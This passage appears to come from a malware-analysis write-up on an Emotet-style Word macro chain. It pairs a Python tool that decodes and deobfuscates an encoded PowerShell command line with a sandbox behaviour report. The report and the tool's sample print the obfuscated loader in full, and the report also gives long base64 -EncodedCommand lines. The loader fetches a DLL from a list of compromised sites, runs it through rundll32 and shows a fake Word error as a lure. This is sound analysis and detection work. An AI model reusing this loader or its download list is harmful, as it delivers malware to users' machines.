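('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/');'''


def _b64_utf16le(script: str) -> str:
    """Encode the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line in the shape of the cmd.exe line in this report.
SAMPLE_CMDLINE = (
    "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open "
    "the file. & P^Ow^er^she^L^L -w hidden -ENCOD " + _b64_utf16le(DECODED_SCRIPT)
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus -ec.
_ENC_PREFIXES = sorted({"ec", *("encodedcommand"[:i] for i in range(1, 15))}, key=len, reverse=True)
_ENC_RE = re.compile(r"(?:^|\s)[-/](?:" + "|".join(_ENC_PREFIXES) + r")\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
_PS_RE = re.compile(r"(?<![\w\\])(?P<exe>[\w.\\:]*powershell(?:\.exe)?)", re.IGNORECASE)

# Static folding rules for the string tricks in the decoded loader.
_CHAR_CAST = re.compile(r"\[\s*char\s*\]\s*(?:\(\s*(\d+)\s*\)|(\d+))", re.IGNORECASE)
_DQ_STRING = re.compile(r'"([^"]*)"')                   # "cReaT`Ed`IR..." -> backticks dropped
_SQ_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'a'+'b' -> 'ab'
_DQ_CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
_SQ_PAREN = re.compile(r"\(\s*'([^']*)'\s*\)")           # ('x') -> 'x'
_DQ_PAREN = re.compile(r'\(\s*"([^"]*)"\s*\)')
_FORMAT = re.compile(r"""(['"])((?:[^'"{}]*\{\d+\})+[^'"{}]*)\1\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')""", re.IGNORECASE)


def normalize_cmd(cmdline: str) -> str:
    """Undo cmd.exe-level obfuscation: caret escapes and chained 'cmd cmd ... /c'."""
    s = re.sub(r"\^(.)", r"\1", cmdline)  # a caret only quotes the next character
    return re.sub(r"^(?:cmd(?:\.exe)?\s+)+", "cmd ", s, flags=re.IGNORECASE)


def case_anomaly(exe_token: str) -> bool:
    """True for spellings such as POwersheLL that no person or installer types."""
    name = exe_token.replace("/", "\\").rsplit("\\", 1)[-1]
    if name.lower().endswith(".exe"):
        name = name[:-4]
    return name not in ("powershell", "PowerShell", "Powershell", "POWERSHELL")


def decode_encoded_command(b64: str) -> str:
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def _apply_format(m: "re.Match") -> str:
    args = re.findall(r"'([^']*)'", m.group(3))
    try:
        return "'" + re.sub(r"\{(\d+)\}", lambda n: args[int(n.group(1))], m.group(2)) + "'"
    except IndexError:
        return m.group(0)


def deobfuscate(script: str) -> str:
    """Fold [char]N casts, backtick-broken member names, string concatenation,
    parenthesised literals and "{1}{0}" -f 'b','a' reordering to a fixed point.
    Pure text rewriting; nothing from the script is executed."""
    prev = None
    while prev != script:
        prev = script
        script = _CHAR_CAST.sub(lambda m: "'" + chr(int(m.group(1) or m.group(2))) + "'", script)
        script = _DQ_STRING.sub(lambda m: '"' + m.group(1).replace("`", "") + '"', script)
        script = _SQ_CONCAT.sub(r"'\1\2'", script)
        script = _DQ_CONCAT.sub(r'"\1\2"', script)
        script = _SQ_PAREN.sub(r"'\1'", script)
        script = _DQ_PAREN.sub(r'"\1"', script)
        script = _FORMAT.sub(_apply_format, script)
    return script


def extract_urls(deobfuscated: str, marker: str = "]anw[3", scheme: str = "http") -> list:
    """The loader keeps its download list as one '@'-separated string with the
    scheme swapped for a marker. marker -> scheme is an ASSUMPTION (the report
    truncates the .Replace() argument); it is the usual Emotet construction."""
    urls = []
    for lit in re.findall(r"'([^']*)'", deobfuscated):
        if marker in lit:
            urls.extend(u for u in lit.replace(marker, scheme).split("@") if u)
    return urls


def analyze(cmdline: str) -> dict:
    norm = normalize_cmd(cmdline)
    result = {"normalized": norm, "exe": None, "case_anomaly": False,
              "script": None, "deobfuscated": None, "urls": []}
    ps = _PS_RE.search(norm)
    if not ps:
        return result
    result["exe"] = ps.group("exe")
    result["case_anomaly"] = case_anomaly(ps.group("exe"))
    enc = _ENC_RE.search(norm, ps.end())
    if enc:
        result["script"] = decode_encoded_command(enc.group(1))
        result["deobfuscated"] = deobfuscate(result["script"])
        result["urls"] = extract_urls(result["deobfuscated"])
    return result
```

Calling analyze(SAMPLE_CMDLINE) reports the case anomaly, returns the decoded script, and after folding shows [TYpE]'SYSTeM.io.dIRECTORy' and [typE]'sYstEM.nET.SeRvIcEPoINTMaNAGer' (System.IO.Directory and System.Net.ServicePointManager), the drop directory '\C3re5c3\Di_p3c9\' that matches the "File created" entry below, and the seven download URLs. The folding is deliberately limited to literal string operators; anything that needs runtime state (variables, .Replace() calls) is left in place so that the output stays a faithful rewrite rather than an emulation.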

                    Persistence and Installation Behavior:

                    Creates processes via WMI
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                    Source: C:\Windows\SysWOW64\rundll32.exe | PE file moved: C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu

                    Hooking and other Techniques for Hiding and Protection:

                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Crppsin\fgsajt.gvd:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Fohbyq\ikksw.jnv:Zone.Identifier read attributes | delete
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (54 occurrences)
                    Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (6 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (53 occurrences)
                    Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (1 occurrence)
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (13 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2556 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation (4 occurrences)
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0023109C FindFirstFileW,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: rundll32.exe, 00000007.00000002.2101005953.00000000006BD000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: rundll32.exe, 00000008.00000002.2102889346.000000000071C000.00000004.00000001.sdmp | Binary or memory string: PPTP00VMware_S
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, (3 occurrences)
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0023C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0023C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                    HIPS / PFW / Operating System Protection Evasion:

                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 5.2.136.90 80
                    Encrypted powershell cmdline option found
                    Source: unknown | Process created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                    Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                    Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArA
CcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
                    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcg
BdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
